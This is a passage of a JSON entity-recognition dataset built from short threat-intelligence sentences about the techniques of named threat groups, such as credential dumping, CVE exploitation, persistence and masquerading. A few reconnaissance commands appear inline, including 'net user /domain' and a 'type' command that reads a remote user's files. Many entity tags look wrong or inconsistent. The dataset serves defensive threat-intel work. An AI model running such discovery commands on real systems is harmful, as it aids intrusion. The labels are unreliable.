"B-HackOrg", "O", "O", "B-Way", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "BRONZE", "BUTLER", "has", "used", "<code>net", "user", "/domain</code>", "to", "identify", "account", "information." ], "ner_tags": [ "B-Idus", "B-HackOrg", "O", "B-Way", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "BRONZE", "BUTLER", "compromised", "three", "Japanese", "websites", "using", "a", "Flash", "exploit", "to", "perform", "watering", "hole", "attacks." ], "ner_tags": [ "B-Idus", "B-HackOrg", "O", "O", "B-Area", "O", "O", "O", "I-Exp", "I-Exp", "O", "O", "B-Org", "I-OffAct", "O" ] }, { "tokens": [ "BRONZE", "BUTLER", "has", "exploited", "Microsoft", "Office", "vulnerabilities", "CVE-2014-4114,", "CVE-2018-0802,", "and", "CVE-2018-0798", "for", "execution." ], "ner_tags": [ "B-Idus", "B-HackOrg", "O", "O", "I-Exp", "I-Exp", "I-Exp", "B-Features", "B-Features", "O", "B-Features", "O", "O" ] }, { "tokens": [ "The", "BRONZE", "BUTLER", "uploader", "or", "malware", "the", "uploader", "uses", "<code>command</code>", "to", "delete", "the", "RAR", "archives", "after", "they", "have", "been", "exfiltrated." ], "ner_tags": [ "O", "B-Idus", "B-HackOrg", "B-Tool", "O", "O", "O", "B-Way", "O", "B-Way", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "BRONZE", "BUTLER", "has", "collected", "a", "list", "of", "files", "from", "the", "victim", "and", "uploaded", "it", "to", "its", "C2", "server,", "and", "then", "created", "a", "new", "list", "of", "specific", "files", "to", "steal." ], "ner_tags": [ "B-Idus", "B-HackOrg", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "BRONZE", "BUTLER", "has", "used", "various", "tools", "to", "download", "files,", "including", "DGet", "(a", "similar", "tool", "to", "wget)." ], "ner_tags": [ "B-Idus", "B-HackOrg", "O", "O", "O", "O", "O", "O", "O", "O", "B-Way", "O", "O", "O", "O", "B-Way" ] }, { "tokens": [ "BRONZE", "BUTLER", "has", "used", "various", "tools", "(such", "as", "Mimikatz", "and", "WCE)", "to", "perform", "credential", "dumping." ], "ner_tags": [ "B-Idus", "B-HackOrg", "O", "O", "O", "O", "O", "O", "B-Way", "O", "B-Way", "O", "O", "O", "O" ] }, { "tokens": [ "BRONZE", "BUTLER", "has", "attempted", "to", "get", "users", "to", "launch", "malicious", "Microsoft", "Word", "attachments", "delivered", "via", "spearphishing", "emails." ], "ner_tags": [ "B-Idus", "B-HackOrg", "O", "O", "O", "O", "O", "O", "O", "B-SamFile", "I-SamFile", "I-SamFile", "B-SecTeam", "O", "O", "B-Way", "O" ] }, { "tokens": [ "BRONZE", "BUTLER", "has", "masked", "executables", "with", "document", "file", "icons", "including", "Word", "and", "Adobe", "PDF." ], "ner_tags": [ "B-Idus", "B-HackOrg", "O", "I-Way", "O", "O", "O", "O", "O", "O", "B-Tool", "O", "I-Tool", "O" ] }, { "tokens": [ "BRONZE", "BUTLER", "has", "given", "malware", "the", "same", "name", "as", "an", "existing", "file", "on", "the", "file", "share", "server", "to", "cause", "users", "to", "unwittingly", "launch", "and", "install", "the", "malware", "on", "additional", "systems." ], "ner_tags": [ "B-Idus", "B-HackOrg", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "BRONZE", "BUTLER", "has", "created", "forged", "Kerberos", "Ticket", "Granting", "Ticket", "(TGT)", "and", "Ticket", "Granting", "Service", "(TGS)", "tickets", "to", "maintain", "administrative", "access." ], "ner_tags": [ "B-Idus", "B-HackOrg", "O", "O", "O", "B-Way", "I-Tool", "I-Tool", "I-Tool", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "BRONZE", "BUTLER", "has", "used", "PowerShell", "for", "execution." ], "ner_tags": [ "B-Idus", "B-HackOrg", "O", "O", "B-Way", "O", "O" ] }, { "tokens": [ "BRONZE", "BUTLER", "has", "made", "use", "of", "Python-based", "remote", "access", "tools." ], "ner_tags": [ "B-Idus", "B-HackOrg", "O", "O", "O", "O", "O", "I-Tool", "I-Tool", "O" ] }, { "tokens": [ "BRONZE", "BUTLER", "has", "used", "a", "batch", "script", "that", "adds", "a", "Registry", "Run", "key", "to", "establish", "malware", "persistence." ], "ner_tags": [ "B-Idus", "B-HackOrg", "O", "O", "O", "B-Tool", "B-Way", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "BRONZE", "BUTLER", "typically", "use", "<code>ping</code>", "and", "Net", "to", "enumerate", "systems." ], "ner_tags": [ "B-Idus", "B-HackOrg", "O", "O", "B-Way", "O", "O", "O", "O", "O" ] }, { "tokens": [ "BRONZE", "BUTLER", "has", "used", "Right-to-Left", "Override", "to", "deceive", "victims", "into", "executing", "several", "strains", "of", "malware." ], "ner_tags": [ "B-Idus", "B-HackOrg", "O", "O", "B-Exp", "I-HackOrg", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "BRONZE", "BUTLER", "has", "used", "schtasks", "to", "register", "a", "scheduled", "task", "to", "execute", "malware", "during", "lateral", "movement." ], "ner_tags": [ "B-Idus", "B-HackOrg", "O", "O", "B-Way", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "BRONZE", "BUTLER", "has", "used", "a", "tool", "to", "capture", "screenshots." ], "ner_tags": [ "B-Idus", "B-HackOrg", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "BRONZE", "BUTLER", "has", "used", "tools", "to", "enumerate", "software", "installed", "on", "an", "infected", "host." ], "ner_tags": [ "B-Idus", "B-HackOrg", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "BRONZE", "BUTLER", "used", "spearphishing", "emails", "with", "malicious", "Microsoft", "Word", "attachments", "to", "infect", "victims." ], "ner_tags": [ "B-Idus", "B-HackOrg", "O", "B-Way", "I-Way", "O", "O", "I-SamFile", "I-SamFile", "B-SecTeam", "O", "O", "O" ] }, { "tokens": [ "Several", "BRONZE", "BUTLER", "tools", "encode", "data", "with", "base64", "when", "posting", "it", "to", "a", "C2", "server." ], "ner_tags": [ "O", "B-Idus", "B-HackOrg", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "BRONZE", "BUTLER", "has", "used", "steganography", "in", "multiple", "operations", "to", "conceal", "malicious", "payloads." ], "ner_tags": [ "B-Idus", "B-HackOrg", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "BRONZE", "BUTLER", "has", "used", "RC4", "encryption", "(for", "Datper", "malware)", "and", "AES", "(for", "xxmm", "malware)", "to", "obfuscate", "HTTP", "traffic.", "BRONZE", "BUTLER", "has", "also", "used", "a", "tool", "called", "RarStar", "that", "encodes", "data", "with", "a", "custom", "XOR", "algorithm", "when", "posting", "it", "to", "a", "C2", "server." ], "ner_tags": [ "B-Idus", "B-HackOrg", "O", "O", "O", "O", "O", "B-Way", "B-Tool", "O", "B-Way", "O", "O", "O", "O", "O", "B-SamFile", "B-Purp", "B-Idus", "B-HackOrg", "O", "O", "O", "O", "O", "O", "B-Way", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "BRONZE", "BUTLER", "has", "used", "TROJ_GETVERSION", "to", "discover", "system", "services." ], "ner_tags": [ "B-Idus", "B-HackOrg", "O", "O", "B-Way", "O", "O", "O", "O" ] }, { "tokens": [ "BRONZE", "BUTLER", "has", "used", "<code>net", "time</code>", "to", "check", "the", "local", "time", "on", "a", "target", "system." ], "ner_tags": [ "B-Idus", "B-HackOrg", "O", "B-Way", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "BRONZE", "BUTLER", "has", "placed", "malware", "on", "file", "shares", "and", "given", "it", "the", "same", "name", "as", "legitimate", "documents", "on", "the", "share." ], "ner_tags": [ "B-Idus", "B-HackOrg", "O", "B-Way", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "BRONZE", "BUTLER", "has", "obtained", "and", "used", "open-source", "tools", "such", "as", "Mimikatz,", "gsecdump,", "and", "Windows", "Credential", "Editor." ], "ner_tags": [ "B-Idus", "B-HackOrg", "O", "O", "O", "O", "O", "O", "O", "O", "B-Way", "B-Way", "O", "I-Tool", "I-Tool", "O" ] }, { "tokens": [ "BRONZE", "BUTLER", "has", "used", "VBS", "and", "VBE", "scripts", "for", "execution." ], "ner_tags": [ "B-Idus", "B-HackOrg", "O", "O", "B-Way", "O", "B-Way", "B-Tool", "O", "O" ] }, { "tokens": [ "BRONZE", "BUTLER", "malware", "has", "used", "HTTP", "for", "C2." ], "ner_tags": [ "B-Way", "B-HackOrg", "B-Tool", "O", "O", "B-Way", "O", "O" ] }, { "tokens": [ "BRONZE", "BUTLER", "has", "used", "batch", "scripts", "and", "the", "command-line", "interface", "for", "execution." ], "ner_tags": [ "B-Idus", "B-HackOrg", "O", "O", "I-Tool", "I-Tool", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "BackdoorDiplomacy", "has", "executed", "DLL", "search", "order", "hijacking." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "BackdoorDiplomacy", "has", "dropped", "legitimate", "software", "onto", "a", "compromised", "host", "and", "used", "it", "to", "execute", "malicious", "DLLs." ], "ner_tags": [ "B-SamFile", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "BackdoorDiplomacy", "has", "exploited", "CVE-2020-5902,", "an", "F5", "BIP-IP", "vulnerability,", "to", "drop", "a", "Linux", "backdoor.", "BackdoorDiplomacy", "has", "also", "exploited", "mis-configured", "Plesk", "servers." ], "ner_tags": [ "B-Idus", "O", "O", "B-Features", "O", "O", "O", "O", "O", "O", "O", "O", "O", "B-SamFile", "O", "O", "O", "O", "B-Way", "B-Tool" ] }, { "tokens": [ "BackdoorDiplomacy", "has", "downloaded", "additional", "files", "and", "tools", "onto", "a", "compromised", "host." ], "ner_tags": [ "B-Idus", "O", "O", "I-Features", "I-Features", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "BackdoorDiplomacy", "has", "copied", "files", "of", "interest", "to", "the", "main", "drive's", "recycle", "bin." ], "ner_tags": [ "B-SamFile", "O", "I-Features", "I-Features", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "BackdoorDiplomacy", "has", "obtained", "and", "used", "leaked", "malware,", "including", "DoublePulsar,", "EternalBlue,", "EternalRocks,", "and", "EternalSynergy,", "in", "its", "operations." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "O", "O", "B-Way", "B-Way", "B-Way", "O", "B-Way", "O", "O", "O" ] }, { "tokens": [ "BackdoorDiplomacy", "has", "disguised", "their", "backdoor", "droppers", "with", "naming", "conventions", "designed", "to", "blend", "into", "normal", "operations." ], "ner_tags": [ "B-Idus", "O", "O", "O", "B-Way", "B-Tool", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "BackdoorDiplomacy", "has", "dropped", "implants", "in", "folders", "named", "for", "legitimate", "software." ], "ner_tags": [ "B-SamFile", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "BackdoorDiplomacy", "has", "used", "SMBTouch,", "a", "vulnerability", "scanner,", "to", "determine", "whether", "a", "target", "is", "vulnerable", "to", "EternalBlue", "malware." ], "ner_tags": [ "B-Idus", "O", "O", "B-Way", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "B-Way", "B-Tool" ] }, { "tokens": [ "BackdoorDiplomacy", "has", "used", "EarthWorm", "for", "network", "tunneling", "with", "a", "SOCKS5", "server", "and", "port", "transfer", "functionalities." ], "ner_tags": [ "B-Way", "O", "O", "B-Way", "O", "I-Way", "O", "O", "O", "B-Way", "O", "O", "O", "O", "O" ] }, { "tokens": [ "BackdoorDiplomacy", "has", "obfuscated", "tools", "and", "malware", "it", "uses", "with", "VMProtect." ], "ner_tags": [ "B-Way", "O", "O", "O", "O", "O", "O", "O", "O", "B-Features" ] }, { "tokens": [ "BackdoorDiplomacy", "has", "used", "an", "executable", "to", "detect", "removable", "media,", "such", "as", "USB", "flash", "drives." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "I-Tool", "I-Tool", "O" ] }, { "tokens": [ "BackdoorDiplomacy", "has", "used", "NetCat", "and", "PortQry", "to", "enumerate", "network", "connections", "and", "display", "the", "status", "of", "related", "TCP", "and", "UDP", "ports." ], "ner_tags": [ "B-Idus", "O", "O", "B-Way", "O", "B-Way", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "B-Way", "O" ] }, { "tokens": [ "BackdoorDiplomacy", "has", "obtained", "a", "variety", "of", "open-source", "reconnaissance", "and", "red", "team", "tools", "for", "discovery", "and", "lateral", "movement." ], "ner_tags": [ "B-Time", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "BackdoorDiplomacy", "has", "used", "web", "shells", "to", "establish", "an", "initial", "foothold", "and", "for", "lateral", "movement", "within", "a", "victim's", "system." ], "ner_tags": [ "B-Idus", "O", "O", "I-Tool", "I-Tool", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "BlackOasis's", "first", "stage", "shellcode", "contains", "a", "NOP", "sled", "with", "alternative", "instructions", "that", "was", "likely", "designed", "to", "bypass", "antivirus", "tools." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "BlackTech", "has", "used", "stolen", "code-signing", "certificates", "for", "its", "malicious", "payloads." ], "ner_tags": [ "O", "O", "O", "I-OffAct", "B-Purp", "B-OffAct", "O", "O", "O", "O" ] }, { "tokens": [ "BlackTech", "has", "used", "DLL", "side", "loading", "by", "giving", "DLLs", "hardcoded", "names", "and", "placing", "them", "in", "searched", "directories." ], "ner_tags": [ "O", "O", "O", "B-Way", "I-Way", "B-Features", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "BlackTech", "has", "used", "valid,", "stolen", "digital", "certificates", "for", "some", "of", "their", "malware", "and", "tools." ], "ner_tags": [ "O", "O", "O", "O", "O", "I-Tool", "I-Tool", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "BlackTech", "has", "exploited", "a", "buffer", "overflow", "vulnerability", "in", "Microsoft", "Internet", "Information", "Services", "(IIS)", "6.0,", "CVE-2017-7269,", "in", "order", "to", "establish", "a", "new", "HTTP", "or", "command", "and", "control", "(C2)", "server." ], "ner_tags": [ "B-Idus", "O", "O", "O", "B-Exp", "O", "B-Exp", "O", "O", "O", "O", "O", "O", "O", "B-Features", "O", "O", "O", "O", "O", "O", "B-Way", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "BlackTech", "has", "exploited", "multiple", "vulnerabilities", "for", "execution,", "including", "Microsoft", "Office", "vulnerabilities", "CVE-2012-0158,", "CVE-2014-6352,", "CVE-2017-0199,", "and", "Adobe", "Flash", "CVE-2015-5119." ], "ner_tags": [ "O", "O", "O", "O", "O", "O", "O", "O", "I-Exp", "I-Exp", "I-Exp", "B-Features", "B-Features", "B-Features", "O", "I-Tool", "I-Tool", "B-Features" ] }, { "tokens": [ "BlackTech", "has", "used", "e-mails", "with", "malicious", "documents", "to", "lure", "victims", "into", "installing", "malware." ], "ner_tags": [ "O", "O", "O", "B-Way", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "BlackTech", "has", "used", "e-mails", "with", "malicious", "links", "to", "lure", "victims", "into", "installing", "malware." ], "ner_tags": [ "O", "O", "O", "B-Way", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "BlackTech", "has", "used", "built-in", "API", "functions." ], "ner_tags": [ "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "BlackTech", "has", "used", "the", "SNScan", "tool", "to", "find", "other", "potential", "targets", "on", "victim", "networks." ], "ner_tags": [ "O", "O", "O", "O", "B-Way", "B-Tool", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "BlackTech", "has", "used", "right-to-left-override", "to", "obfuscate", "the", "filenames", "of", "malicious", "e-mail", "attachments." ], "ner_tags": [ "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "B-Way", "O" ] }, { "tokens": [ "BlackTech", "has", "used", "Putty", "for", "remote", "access." ], "ner_tags": [ "O", "O", "O", "B-Way", "O", "I-OffAct", "O" ] }, { "tokens": [ "BlackTech", "has", "used", "spearphishing", "e-mails", "with", "malicious", "password-protected", "archived", "files", "(ZIP", "or", "RAR)", "to", "deliver", "malware." ], "ner_tags": [ "O", "O", "O", "B-Way", "O", "O", "O", "O", "O", "O", "B-Tool", "O", "B-Way", "O", "O", "O" ] }, { "tokens": [ "BlackTech", "has", "used", "spearphishing", "e-mails", "with", "links", "to", "cloud", "services", "to", "deliver", "malware." ], "ner_tags": [ "O", "O", "O", "B-Way", "O", "O", "O", "O", "I-Tool", "I-Tool", "O", "O", "O" ] }, { "tokens": [ "BlackTech", "has", "obtained", "and", "used", "tools", "such", "as", "Putty,", "SNScan,", "and", "PsExec", "for", "its", "operations." ], "ner_tags": [ "O", "O", "O", "O", "O", "O", "O", "O", "B-Way", "B-Way", "O", "B-Way", "O", "O", "O" ] }, { "tokens": [ "Blue", "Mockingbird", "has", "used", "JuicyPotato", "to", "abuse", "the", "<code>SeImpersonate</code>", "token", "privilege", "to", "escalate", "from", "web", "application", "pool", "accounts", "to", "NT", "Authority\\SYSTEM." ], "ner_tags": [ "I-HackOrg", "I-HackOrg", "O", "O", "B-Way", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Blue", "Mockingbird", "has", "used", "wmic.exe", "and", "Windows", "Registry", "modifications", "to", "set", "the", "COR_PROFILER", "environment", "variable", "to", "execute", "a", "malicious", "DLL", "whenever", "a", "process", "loads", "the", ".NET", "CLR." ], "ner_tags": [ "I-HackOrg", "I-HackOrg", "O", "O", "B-Way", "O", "O", "O", "O", "O", "O", "O", "B-Way", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "B-SamFile", "O" ] }, { "tokens": [ "Blue", "Mockingbird", "has", "obfuscated", "the", "wallet", "address", "in", "the", "payload", "binary." ], "ner_tags": [ "I-HackOrg", "I-HackOrg", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Blue", "Mockingbird", "has", "gained", "initial", "access", "by", "exploiting", "CVE-2019-18935,", "a", "vulnerability", "within", "Telerik", "UI", "for", "ASP.NET", "AJAX." ], "ner_tags": [ "I-HackOrg", "I-HackOrg", "O", "O", "O", "O", "O", "O", "B-Features", "O", "O", "O", "O", "O", "O", "B-SamFile", "B-SecTeam" ] }, { "tokens": [ "Blue", "Mockingbird", "has", "used", "Mimikatz", "to", "retrieve", "credentials", "from", "LSASS", "memory." ], "ner_tags": [ "I-HackOrg", "I-HackOrg", "O", "O", "B-Way", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Blue", "Mockingbird", "has", "masqueraded", "their", "XMRIG", "payload", "name", "by", "naming", "it", "wercplsupporte.dll", "after", "the", "legitimate", "wercplsupport.dll", "file." ], "ner_tags": [ "I-HackOrg", "I-HackOrg", "O", "O", "O", "O", "O", "O", "O", "O", "O", "B-SamFile", "O", "O", "O", "B-SamFile", "O" ] }, { "tokens": [ "Blue", "Mockingbird", "has", "used", "Windows", "Registry", "modifications", "to", "specify", "a", "DLL", "payload." ], "ner_tags": [ "I-HackOrg", "I-HackOrg", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Blue", "Mockingbird", "has", "used", "PowerShell", "reverse", "TCP", "shells", "to", "issue", "interactive", "commands", "over", "a", "network", "connection." ], "ner_tags": [ "I-HackOrg", "I-HackOrg", "O", "O", "B-Way", "I-Tool", "O", "B-Tool", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Blue", "Mockingbird", "has", "used", "frp,", "ssf,", "and", "Venom", "to", "establish", "SOCKS", "proxy", "connections." ], "ner_tags": [ "I-HackOrg", "I-HackOrg", "O", "O", "B-Way", "B-Way", "O", "B-Way", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Blue", "Mockingbird", "has", "executed", "custom-compiled", "XMRIG", "miner", "DLLs", "using", "regsvr32.exe." ], "ner_tags": [ "I-HackOrg", "I-HackOrg", "O", "O", "O", "B-Way", "B-Tool", "O", "O", "B-SamFile" ] }, { "tokens": [ "Blue", "Mockingbird", "has", "used", "Remote", "Desktop", "to", "log", "on", "to", "servers", "interactively", "and", "manually", "copy", "files", "to", "remote", "hosts." ], "ner_tags": [ "I-HackOrg", "I-HackOrg", "O", "O", "B-Way", "B-Tool", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Blue", "Mockingbird", "has", "used", "XMRIG", "to", "mine", "cryptocurrency", "on", "victim", "systems." ], "ner_tags": [ "I-HackOrg", "I-HackOrg", "O", "O", "B-Way", "O", "I-Purp", "I-Purp", "O", "O", "O" ] }, { "tokens": [ "Blue", "Mockingbird", "has", "executed", "custom-compiled", "XMRIG", "miner", "DLLs", "using", "rundll32.exe." ], "ner_tags": [ "I-HackOrg", "I-HackOrg", "O", "O", "O", "B-Way", "I-Tool", "O", "O", "B-SamFile" ] }, { "tokens": [ "Blue", "Mockingbird", "has", "used", "Windows", "Explorer", "to", "manually", "copy", "malicious", "files", "to", "remote", "hosts", "over", "SMB." ], "ner_tags": [ "I-HackOrg", "I-HackOrg", "O", "O", "I-Tool", "I-Tool", "O", "O", "O", "O", "O", "O", "O", "O", "O", "B-Way" ] }, { "tokens": [ "Blue", "Mockingbird", "has", "used", "Windows", "Scheduled", "Tasks", "to", "establish", "persistence", "on", "local", "and", "remote", "hosts." ], "ner_tags": [ "I-HackOrg", "I-HackOrg", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Blue", "Mockingbird", "has", "executed", "custom-compiled", "XMRIG", "miner", "DLLs", "by", "configuring", "them", "to", "execute", "via", "the", "\"wercplsupport\"", "service." ], "ner_tags": [ "I-HackOrg", "I-HackOrg", "O", "O", "O", "B-Way", "I-Tool", "B-Tool", "O", "O", "O", "O", "O", "O", "O", "B-Way", "O" ] }, { "tokens": [ "Blue", "Mockingbird", "has", "collected", "hardware", "details", "for", "the", "victim's", "system,", "including", "CPU", "and", "memory", "information." ], "ner_tags": [ "I-HackOrg", "I-HackOrg", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Blue", "Mockingbird", "has", "obtained", "and", "used", "tools", "such", "as", "Mimikatz." ], "ner_tags": [ "I-HackOrg", "I-HackOrg", "O", "O", "O", "O", "O", "O", "O", "B-Way" ] }, { "tokens": [ "Blue", "Mockingbird", "has", "used", "batch", "script", "files", "to", "automate", "execution", "and", "deployment", "of", "payloads." ], "ner_tags": [ "I-HackOrg", "I-HackOrg", "O", "O", "I-Tool", "I-Tool", "O", "O", "O", "O", "O", "B-Features", "O", "O" ] }, { "tokens": [ "Blue", "Mockingbird", "has", "used", "wmic.exe", "to", "set", "environment", "variables." ], "ner_tags": [ "I-HackOrg", "I-HackOrg", "O", "O", "B-Way", "O", "O", "O", "O" ] }, { "tokens": [ "Blue", "Mockingbird", "has", "used", "mofcomp.exe", "to", "establish", "WMI", "Event", "Subscription", "persistence", "mechanisms", "configured", "from", "a", "*.mof", "file." ], "ner_tags": [ "I-HackOrg", "I-HackOrg", "O", "O", "B-SamFile", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "B-SamFile", "O" ] }, { "tokens": [ "Blue", "Mockingbird", "has", "made", "their", "XMRIG", "payloads", "persistent", "as", "a", "Windows", "Service." ], "ner_tags": [ "I-HackOrg", "I-HackOrg", "O", "O", "O", "B-Way", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "CURIUM", "has", "exfiltrated", "data", "from", "a", "compromised", "machine." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "CURIUM", "has", "lured", "users", "into", "opening", "malicious", "files", "delivered", "via", "social", "media." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "B-SamFile", "I-SamFile", "O", "O", "I-Idus", "O" ] }, { "tokens": [ "CURIUM", "has", "established", "a", "network", "of", "fictitious", "social", "media", "accounts,", "including", "on", "Facebook", "and", "LinkedIn,", "to", "establish", "relationships", "with", "victims,", "often", "posing", "as", "an", "attractive", "woman." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "O", "I-Idus", "I-Idus", "O", "O", "O", "B-Org", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "CURIUM", "has", "used", "social", "media", "to", "deliver", "malicious", "files", "to", "victims." ], "ner_tags": [ "B-Idus", "O", "O", "I-Idus", "I-Idus", "O", "O", "B-SamFile", "I-SamFile", "O", "O" ] }, { "tokens": [ "Carbanak", "has", "used", "a", "VBScript", "named", "\"ggldr\"", "that", "uses", "Google", "Apps", "Script,", "Sheets,", "and", "Forms", "services", "for", "C2." ], "ner_tags": [ "B-Features", "O", "O", "O", "O", "O", "B-Way", "O", "O", "I-Tool", "I-Tool", "O", "O", "O", "B-Way", "B-Tool", "O", "O" ] }, { "tokens": [ "Carbanak", "may", "use", "netsh", "to", "add", "local", "firewall", "rule", "exceptions." ], "ner_tags": [ "B-Features", "O", "O", "B-Way", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Carbanak", "has", "copied", "legitimate", "service", "names", "to", "use", "for", "malicious", "services." ], "ner_tags": [ "B-Features", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Carbanak", "has", "named", "malware", "\"svchost.exe,\"", "which", "is", "the", "name", "of", "the", "Windows", "shared", "service", "host", "program." ], "ner_tags": [ "B-Features", "O", "O", "O", "B-Way", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Carbanak", "used", "legitimate", "programs", "such", "as", "AmmyyAdmin", "and", "Team", "Viewer", "for", "remote", "interactive", "C2", "to", "target", "systems." ], "ner_tags": [ "B-Features", "O", "O", "O", "O", "O", "B-Way", "O", "I-Tool", "I-Tool", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Carbanak", "installs", "VNC", "server", "software", "that", "executes", "through", "rundll32." ], "ner_tags": [ "B-Features", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Carbanak", "has", "obtained", "and", "used", "open-source", "tools", "such", "as", "PsExec", "and", "Mimikatz." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "O", "O", "O", "B-Way", "O", "B-Way" ] }, { "tokens": [ "Carbanak", "actors", "used", "legitimate", "credentials", "of", "banking", "employees", "to", "perform", "operations", "that", "sent", "them", "millions", "of", "dollars." ], "ner_tags": [ "B-Features", "B-HackOrg", "O", "O", "O", "O", "I-Org", "I-Org", "O", "O", "O", "O", "O", "O", "O", "B-Purp", "O" ] }, { "tokens": [ "Carbanak", "malware", "installs", "itself", "as", "a", "service", "to", "provide", "persistence", "and", "SYSTEM", "privileges." ], "ner_tags": [ "B-Features", "B-Tool", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Chimera", "has", "used", "gzip", "for", "Linux", "OS", "and", "a", "modified", "RAR", "software", "to", "archive", "data", "on", "Windows", "hosts." ], "ner_tags": [ "B-Idus", "O", "O", "B-Way", "O", "O", "O", "O", "O", "O", "B-Way", "O", "O", "I-Purp", "I-Purp", "O", "O", "O" ] }, { "tokens": [ "Chimera", "has", "used", "custom", "DLLs", "for", "continuous", "retrieval", "of", "data", "from", "memory." ], "ner_tags": [ "B-Idus", "O", "O", "I-Tool", "B-Tool", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Chimera", "has", "used", "<code>type", "\\\\<hostname>\\c$\\Users\\<username>\\Favorites\\Links\\Bookmarks", "bar\\Imported", "From", "IE\\*citrix*</code>", "for", "bookmark", "discovery." ], "ner_tags": [ "B-Idus", "O", "B-Way", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Chimera", "has", "cleared", "event", "logs", "on", "compromised", "hosts." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Chimera", "has", "encoded", "PowerShell", "commands." ], "ner_tags": [ "B-Way", "O", "O", "B-Way", "B-Tool" ] }, { "tokens": [ "Chimera", "has", "used", "credential", "stuffing", "against", "victim's", "remote", "services", "to", "obtain", "valid", "accounts." ], "ner_tags": [ "B-Idus", "O", "O", "B-Way", "B-Tool", "O", "O", "O", "O", "O", "I-Purp", "I-Purp", "O" ] }, { "tokens": [ "Chimera", "has", "collected", "credentials", "for", "the", "target", "organization", "from", "previous", "breaches", "for", "use", "in", "brute", "force", "attacks." ], "ner_tags": [ "B-Idus", "O", "O", 